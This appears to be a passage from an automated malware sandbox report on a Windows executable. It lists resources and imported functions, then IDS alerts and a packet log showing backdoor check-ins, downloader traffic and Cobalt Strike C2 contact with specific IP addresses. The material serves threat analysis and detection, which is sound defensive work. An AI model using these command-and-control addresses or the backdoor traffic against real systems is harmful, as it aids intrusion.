                                                                                                                                                                                                                        RT_ICON0x6bd1c0x988Device independent bitmap graphic, 24 x 48 x 32, image size 0, resolution 11811 x 11811 px/mEnglishUnited States0.4004098360655738
                                                                                                                                                                                                                        RT_ICON0x6c6a40x468Device independent bitmap graphic, 16 x 32 x 32, image size 0, resolution 11811 x 11811 px/mEnglishUnited States0.524822695035461
                                                                                                                                                                                                                        RT_DIALOG0x6cb0c0x6adataEnglishUnited States0.8018867924528302
                                                                                                                                                                                                                        RT_DIALOG0x6cb780x270dataEnglishUnited States0.47115384615384615
                                                                                                                                                                                                                        RT_DIALOG0x6cde80x4ccdataEnglishUnited States0.3965798045602606
                                                                                                                                                                                                                        RT_DIALOG0x6d2b40x7d8dataEnglishUnited States0.39193227091633465
                                                                                                                                                                                                                        RT_DIALOG0x6da8c0xeedataEnglishUnited States0.6512605042016807
                                                                                                                                                                                                                        RT_RCDATA0x6db7c0x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                                                                                                                                                        RT_RCDATA0x6f37c0x274dataEnglishUnited States0.5812101910828026
                                                                                                                                                                                                                        RT_RCDATA0x6f5f00x9bdDelphi compiled form 'TfmReference'EnglishUnited States0.44885679903730447
                                                                                                                                                                                                                        RT_RCDATA0x6ffb00x34dDelphi compiled form 'TMEContactForm'EnglishUnited States0.43431952662721895
                                                                                                                                                                                                                        RT_RCDATA0x703000x2092Delphi compiled form 'TWizardForm'EnglishUnited States0.2299112497001679
                                                                                                                                                                                                                        RT_RCDATA0x723940x80dataEnglishUnited States1.0859375
                                                                                                                                                                                                                        RT_GROUP_ICON0x724140x68dataEnglishUnited States0.7884615384615384
                                                                                                                                                                                                                        RT_VERSION0x7247c0x318dataEnglishUnited States0.47474747474747475
                                                                                                                                                                                                                        RT_MANIFEST0x727940x205XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5667311411992263
                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                        KERNEL32.dllCreateFileA, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, FlushFileBuffers, GetLocaleInfoA, LCMapStringW, LCMapStringA, GetConsoleMode, GetConsoleCP, SetFilePointer, InitializeCriticalSectionAndSpinCount, GetSystemTimeAsFileTime, GetCurrentProcessId, GetTickCount, QueryPerformanceCounter, SetHandleCount, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, LoadLibraryW, GetStringTypeW, GetStringTypeA, IsValidCodePage, GetACP, GetCPInfo, WriteFile, ExitProcess, Sleep, HeapSize, HeapReAlloc, HeapCreate, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, GetStartupInfoA, GetCommandLineA, GetModuleFileNameW, GetFileType, WriteConsoleW, VirtualQuery, GetSystemInfo, GetModuleHandleW, VirtualProtect, RtlUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, VirtualFree, IsProcessorFeaturePresent, LoadLibraryA, HeapAlloc, GetProcessHeap, HeapFree, InterlockedCompareExchange, InitializeCriticalSection, IsDBCSLeadByte, GetProcAddress, lstrcmpiA, FreeLibrary, SizeofResource, LoadLibraryExA, WideCharToMultiByte, GlobalUnlock, GlobalLock, lstrcmpA, MulDiv, lstrlenW, MultiByteToWideChar, lstrlenA, GetModuleFileNameA, InterlockedIncrement, InterlockedDecrement, FlushInstructionCache, DeleteCriticalSection, GlobalAlloc, RaiseException, GlobalFree, GlobalHandle, LockResource, LoadResource, FindResourceA, LeaveCriticalSection, EnterCriticalSection, GetCurrentThreadId, GetLastError, GetSystemTime, GetModuleHandleA, WaitForSingleObject, CancelWaitableTimer, WaitForMultipleObjectsEx, SetWaitableTimer, LocalFileTimeToFileTime, SystemTimeToFileTime, GetLocalTime, CreateEventA, CreateWaitableTimerA, VirtualAlloc, CreateToolhelp32Snapshot, SetLastError, GetConsoleScreenBufferInfo, GetStdHandle, MapViewOfFile, OpenFileMappingA, CloseHandle, GetCurrentProcess, GetCurrentThread, GetOEMCP
                                                                                                                                                                                                                        USER32.dllSetRect, DefWindowProcA, SetLayeredWindowAttributes, CreateMenu, CreatePopupMenu, SetMenu, SetCapture, InvalidateRect, GetCursorPos, TrackPopupMenu, OffsetRect, GetCapture, BeginPaint, EndPaint, GetMenuCheckMarkDimensions, GetFocus, DrawTextA, CopyRect, DrawFocusRect, MapDialogRect, SetWindowContextHelpId, DialogBoxParamA, GetWindowRect, MonitorFromWindow, GetMonitorInfoA, MapWindowPoints, GetSystemMetrics, SendDlgItemMessageA, RegisterWindowMessageA, InvalidateRgn, SetScrollInfo, GetScrollInfo, ScrollWindow, UpdateWindow, DrawEdge, LoadStringA, PtInRect, GetDlgCtrlID, SetRectEmpty, SetScrollPos, GetScrollPos, DestroyMenu, GetScrollRange, SetCursor, SetWindowTextA, GetWindowTextA, GetWindowTextLengthA, EndDialog, GetDesktopWindow, ReleaseCapture, GetWindow, IsChild, SetFocus, ScreenToClient, ClientToScreen, CreateAcceleratorTableA, FillRect, CharNextA, SetWindowPos, GetClassNameA, GetParent, ReleaseDC, DestroyAcceleratorTable, IsWindow, RedrawWindow, RegisterClassExA, GetClassInfoExA, GetWindowLongA, CallWindowProcA, SetWindowLongA, DialogBoxIndirectParamA, GetSysColor, SendMessageW, GetActiveWindow, GetCursor, AttachThreadInput, GetWindowThreadProcessId, WindowFromPoint, GetCursorInfo, IsRectEmpty, KillTimer, TrackPopupMenuEx, SetTimer, GetDC, MoveWindow, GetDlgItem, LoadImageA, CreateWindowExW, GetClientRect, CreateWindowExA, LoadIconA, LoadCursorA, AppendMenuA, GetSystemMenu, LoadBitmapA, DestroyWindow, SendMessageA, DrawFrameControl, UnregisterClassA
                                                                                                                                                                                                                        GDI32.dllLineTo, MoveToEx, SetMapMode, GetMapMode, CreateFontIndirectA, SelectObject, CreateEllipticRgn, CreateCompatibleDC, CreateSolidBrush, GetObjectA, BitBlt, StretchBlt, DeleteDC, EnumFontFamiliesA, CreatePen, DeleteObject, GetDeviceCaps, CreateCompatibleBitmap, GetStockObject, SaveDC, GetTextExtentPoint32A, GetTextColor, RestoreDC, GetCurrentPositionEx, GetClipBox, LPtoDP, DPtoLP, SetWindowOrgEx, SetBkMode, SetBkColor, BeginPath, SetTextColor, ExtTextOutA
                                                                                                                                                                                                                        COMDLG32.dllChooseFontA, GetOpenFileNameA
                                                                                                                                                                                                                        ADVAPI32.dllRegDeleteValueA, OpenProcessToken, GetTokenInformation, AllocateAndInitializeSid, RegSetValueExA, RegDeleteKeyA, RegCreateKeyExA, RegQueryInfoKeyA, OpenThreadToken, RegEnumKeyExA, RegCloseKey, RegOpenKeyExA, FreeSid, EqualSid
                                                                                                                                                                                                                        SHELL32.dllSHGetMalloc, SHGetDesktopFolder
                                                                                                                                                                                                                        ole32.dllOleInitialize, OleUninitialize, CoTaskMemRealloc, StringFromGUID2, OleLockRunning, CLSIDFromString, CoGetClassObject, CLSIDFromProgID, CreateStreamOnHGlobal, CoUninitialize, CoTaskMemFree, CoCreateInstance, CoInitialize, CoTaskMemAlloc
                                                                                                                                                                                                                        OLEAUT32.dllLoadTypeLib, SysAllocStringLen, VarUI4FromStr, OleCreateFontIndirect, SysAllocString, VariantClear, VariantInit, LoadRegTypeLib, SysStringLen, SysFreeString, OleLoadPicture
                                                                                                                                                                                                                        MSIMG32.dllTransparentBlt
                                                                                                                                                                                                                        WINTRUST.dllCryptCATGetCatAttrInfo, CryptCATGetMemberInfo, CryptCATHandleFromStore
                                                                                                                                                                                                                        Secur32.dllQuerySecurityPackageInfoA
                                                                                                                                                                                                                        COMCTL32.dllImageList_GetImageInfo, ImageList_Draw, ImageList_GetImageCount, InitCommonControlsEx
                                                                                                                                                                                                                        SHLWAPI.dllStrRetToStrA
                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                                                                        TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        2024-07-25T15:13:30.018479+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49726443192.168.2.620.42.73.29
                                                                                                                                                                                                                        2024-07-25T15:15:33.325593+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4975680192.168.2.644.221.84.105
                                                                                                                                                                                                                        2024-07-25T15:15:13.424683+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4975380192.168.2.692.246.89.93
                                                                                                                                                                                                                        2024-07-25T15:13:19.352778+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup6196453192.168.2.61.1.1.1
                                                                                                                                                                                                                        2024-07-25T15:13:51.355961+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49738799192.168.2.644.221.84.105
                                                                                                                                                                                                                        2024-07-25T15:14:38.021714+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4974780192.168.2.692.246.89.93
                                                                                                                                                                                                                        2024-07-25T15:16:11.428877+0200TCP2037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst804976434.218.204.173192.168.2.6
                                                                                                                                                                                                                        2024-07-25T15:16:36.375930+0200TCP2527002ET Threatview.io High Confidence Cobalt Strike C2 IP group 3804977074.119.239.234192.168.2.6
                                                                                                                                                                                                                        2024-07-25T15:13:42.539489+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4973380192.168.2.6170.39.226.155
                                                                                                                                                                                                                        2024-07-25T15:14:50.224302+0200TCP2037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst804974944.221.84.105192.168.2.6
                                                                                                                                                                                                                        2024-07-25T15:16:57.852843+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4977080192.168.2.674.119.239.234
                                                                                                                                                                                                                        2024-07-25T15:16:22.126954+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4976780192.168.2.654.244.188.177
                                                                                                                                                                                                                        2024-07-25T15:13:41.635043+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49731799192.168.2.644.221.84.105
                                                                                                                                                                                                                        2024-07-25T15:16:02.561286+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4976280192.168.2.644.213.104.86
                                                                                                                                                                                                                        2024-07-25T15:15:59.589424+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4976180192.168.2.618.141.10.107
                                                                                                                                                                                                                        2024-07-25T15:15:22.630192+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4975480192.168.2.6208.100.26.245
                                                                                                                                                                                                                        2024-07-25T15:13:37.565241+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972913.85.23.86192.168.2.6
                                                                                                                                                                                                                        2024-07-25T15:15:47.481369+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4976080192.168.2.6185.215.113.66
                                                                                                                                                                                                                        2024-07-25T15:16:04.594112+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4976380192.168.2.654.244.188.177
                                                                                                                                                                                                                        2024-07-25T15:13:24.873191+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49724799192.168.2.644.221.84.105
                                                                                                                                                                                                                        2024-07-25T15:16:03.569322+0200TCP2037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst804976244.213.104.86192.168.2.6
                                                                                                                                                                                                                        2024-07-25T15:16:00.606808+0200TCP2037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst804976118.141.10.107192.168.2.6
                                                                                                                                                                                                                        2024-07-25T15:16:10.422241+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4976480192.168.2.634.218.204.173
                                                                                                                                                                                                                        2024-07-25T15:13:47.058273+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49737799192.168.2.644.221.84.105
                                                                                                                                                                                                                        2024-07-25T15:15:46.397489+0200TCP2037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst804975913.251.16.150192.168.2.6
                                                                                                                                                                                                                        2024-07-25T15:14:28.521053+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4974280192.168.2.692.246.89.93
                                                                                                                                                                                                                        2024-07-25T15:14:59.237828+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4975180192.168.2.692.246.89.93
                                                                                                                                                                                                                        2024-07-25T15:13:53.993201+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49739799192.168.2.644.221.84.105
                                                                                                                                                                                                                        2024-07-25T15:15:45.378020+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4975980192.168.2.613.251.16.150
                                                                                                                                                                                                                        2024-07-25T15:14:15.205118+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434974413.85.23.86192.168.2.6
                                                                                                                                                                                                                        2024-07-25T15:14:49.123532+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4974980192.168.2.644.221.84.105
                                                                                                                                                                                                                        2024-07-25T15:14:05.816494+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4973680192.168.2.692.63.197.48
                                                                                                                                                                                                                        2024-07-25T15:13:19.951471+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49722799192.168.2.644.221.84.105
                                                                                                                                                                                                                        2024-07-25T15:13:44.441888+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49735799192.168.2.644.221.84.105
                                                                                                                                                                                                                        2024-07-25T15:17:05.252309+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4977180192.168.2.654.244.188.177
                                                                                                                                                                                                                        2024-07-25T15:16:04.594153+0200TCP2037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst804976354.244.188.177192.168.2.6
                                                                                                                                                                                                                        2024-07-25T15:15:29.430204+0200TCP2037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst804975544.213.104.86192.168.2.6
                                                                                                                                                                                                                        2024-07-25T15:16:30.553398+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4976980192.168.2.654.244.188.177
                                                                                                                                                                                                                        2024-07-25T15:15:28.415157+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4975580192.168.2.644.213.104.86
                                                                                                                                                                                                                        2024-07-25T15:16:27.854244+0200UDP2018316ET MALWARE Possible Zeus GameOver/FluBot Related DGA NXDOMAIN Responses53513871.1.1.1192.168.2.6
                                                                                                                                                                                                                        2024-07-25T15:16:13.644028+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4976680192.168.2.654.244.188.177
                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Jul 25, 2024 15:13:19.527343035 CEST49722799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:19.532785892 CEST7994972244.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:19.532874107 CEST49722799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:19.618397951 CEST49722799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:19.623466015 CEST7994972244.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:19.951332092 CEST7994972244.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:19.951471090 CEST49722799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:19.951823950 CEST7994972244.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:19.951879025 CEST49722799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:19.953090906 CEST49722799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:19.958446026 CEST7994972244.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:24.446144104 CEST49724799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:24.451874018 CEST7994972444.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:24.452018976 CEST49724799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:24.452306986 CEST49724799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:24.457834959 CEST7994972444.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:24.873049974 CEST7994972444.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:24.873191118 CEST49724799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:24.874160051 CEST7994972444.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:24.874501944 CEST49724799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:24.875358105 CEST49724799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:24.880661964 CEST7994972444.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:39.596640110 CEST49731799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:40.211086035 CEST7994973144.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:40.211189032 CEST49731799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:40.221301079 CEST49731799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.224095106 CEST7994973144.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.226164103 CEST49731799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.233175039 CEST7994973144.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.563338041 CEST4973380192.168.2.6170.39.226.155
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.568283081 CEST8049733170.39.226.155192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.568463087 CEST4973380192.168.2.6170.39.226.155
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.579219103 CEST4973380192.168.2.6170.39.226.155
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.584355116 CEST8049733170.39.226.155192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.634917021 CEST7994973144.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.635042906 CEST49731799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.635552883 CEST7994973144.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.635596037 CEST49731799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.637311935 CEST49731799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:41.649199963 CEST7994973144.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:42.539278984 CEST8049733170.39.226.155192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:42.539489031 CEST4973380192.168.2.6170.39.226.155
                                                                                                                                                                                                                        Jul 25, 2024 15:13:42.756103039 CEST4973480192.168.2.6199.59.243.226
                                                                                                                                                                                                                        Jul 25, 2024 15:13:42.761708975 CEST8049734199.59.243.226192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:42.761801004 CEST4973480192.168.2.6199.59.243.226
                                                                                                                                                                                                                        Jul 25, 2024 15:13:42.762067080 CEST4973480192.168.2.6199.59.243.226
                                                                                                                                                                                                                        Jul 25, 2024 15:13:42.772491932 CEST8049734199.59.243.226192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:43.265232086 CEST8049734199.59.243.226192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:43.265315056 CEST4973480192.168.2.6199.59.243.226
                                                                                                                                                                                                                        Jul 25, 2024 15:13:43.265372038 CEST8049734199.59.243.226192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:43.265554905 CEST4973480192.168.2.6199.59.243.226
                                                                                                                                                                                                                        Jul 25, 2024 15:13:43.790323019 CEST49735799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:43.999459982 CEST7994973544.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:44.002218962 CEST49735799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:44.022974968 CEST49735799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:44.028070927 CEST7994973544.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:44.298873901 CEST4973480192.168.2.6199.59.243.226
                                                                                                                                                                                                                        Jul 25, 2024 15:13:44.298922062 CEST4973480192.168.2.6199.59.243.226
                                                                                                                                                                                                                        Jul 25, 2024 15:13:44.432631969 CEST4973680192.168.2.692.63.197.48
                                                                                                                                                                                                                        Jul 25, 2024 15:13:44.441735029 CEST804973692.63.197.48192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:44.441783905 CEST7994973544.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:44.441859961 CEST4973680192.168.2.692.63.197.48
                                                                                                                                                                                                                        Jul 25, 2024 15:13:44.441888094 CEST49735799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:44.442042112 CEST4973680192.168.2.692.63.197.48
                                                                                                                                                                                                                        Jul 25, 2024 15:13:44.444720030 CEST7994973544.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:44.444782019 CEST49735799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:44.445810080 CEST49735799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:44.446788073 CEST804973692.63.197.48192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:44.455039978 CEST7994973544.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:46.081536055 CEST8049733170.39.226.155192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:46.081609011 CEST4973380192.168.2.6170.39.226.155
                                                                                                                                                                                                                        Jul 25, 2024 15:13:46.649044037 CEST49737799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:46.654526949 CEST7994973744.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:46.654692888 CEST49737799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:46.669744015 CEST49737799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:46.675914049 CEST7994973744.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:47.058120012 CEST7994973744.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:47.058212042 CEST7994973744.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:47.058273077 CEST49737799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:47.059492111 CEST49737799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:47.059492111 CEST49737799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:47.064668894 CEST7994973744.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:50.919034004 CEST49738799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:50.951405048 CEST7994973844.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:50.951550961 CEST49738799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:50.951833010 CEST49738799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:50.965195894 CEST7994973844.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:51.355884075 CEST7994973844.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:51.355961084 CEST49738799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:51.356477976 CEST7994973844.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:51.356537104 CEST49738799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:51.357373953 CEST49738799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:51.362638950 CEST7994973844.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:53.591869116 CEST49739799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:53.596898079 CEST7994973944.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:53.596976995 CEST49739799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:53.598258972 CEST49739799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:53.603276014 CEST7994973944.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:53.993069887 CEST7994973944.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:53.993105888 CEST7994973944.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:13:53.993201017 CEST49739799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:53.993242979 CEST49739799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:54.006617069 CEST49739799192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:13:54.012000084 CEST7994973944.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:05.816315889 CEST804973692.63.197.48192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:05.816493988 CEST4973680192.168.2.692.63.197.48
                                                                                                                                                                                                                        Jul 25, 2024 15:14:05.817023039 CEST4973680192.168.2.692.63.197.48
                                                                                                                                                                                                                        Jul 25, 2024 15:14:05.822362900 CEST804973692.63.197.48192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:07.007265091 CEST4974280192.168.2.692.246.89.93
                                                                                                                                                                                                                        Jul 25, 2024 15:14:07.012350082 CEST804974292.246.89.93192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:07.012469053 CEST4974280192.168.2.692.246.89.93
                                                                                                                                                                                                                        Jul 25, 2024 15:14:07.012612104 CEST4974280192.168.2.692.246.89.93
                                                                                                                                                                                                                        Jul 25, 2024 15:14:07.017654896 CEST804974292.246.89.93192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:28.520955086 CEST804974292.246.89.93192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:28.521053076 CEST4974280192.168.2.692.246.89.93
                                                                                                                                                                                                                        Jul 25, 2024 15:14:28.521159887 CEST4974280192.168.2.692.246.89.93
                                                                                                                                                                                                                        Jul 25, 2024 15:14:28.525917053 CEST804974292.246.89.93192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:30.006541967 CEST4974780192.168.2.692.246.89.93
                                                                                                                                                                                                                        Jul 25, 2024 15:14:30.014746904 CEST804974792.246.89.93192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:30.014868021 CEST4974780192.168.2.692.246.89.93
                                                                                                                                                                                                                        Jul 25, 2024 15:14:30.015019894 CEST4974780192.168.2.692.246.89.93
                                                                                                                                                                                                                        Jul 25, 2024 15:14:30.023714066 CEST804974792.246.89.93192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:38.021713972 CEST4974780192.168.2.692.246.89.93
                                                                                                                                                                                                                        Jul 25, 2024 15:14:48.611820936 CEST4974980192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:14:48.618596077 CEST804974944.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:48.618688107 CEST4974980192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:14:48.618901968 CEST4974980192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:14:48.624283075 CEST804974944.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:49.123444080 CEST804974944.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:49.123466015 CEST804974944.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:49.123532057 CEST4974980192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:14:50.126854897 CEST4974980192.168.2.644.221.84.105
                                                                                                                                                                                                                        Jul 25, 2024 15:14:50.224302053 CEST804974944.221.84.105192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:55.235681057 CEST4975180192.168.2.692.246.89.93
                                                                                                                                                                                                                        Jul 25, 2024 15:14:55.240565062 CEST804975192.246.89.93192.168.2.6
                                                                                                                                                                                                                        Jul 25, 2024 15:14:55.240693092 CEST4975180192.168.2.692.246.89.93
                                                                                                                                                                                                                        Jul 25, 2024 15:14:55.240864038 CEST4975180192.168.2.692.246.89.93
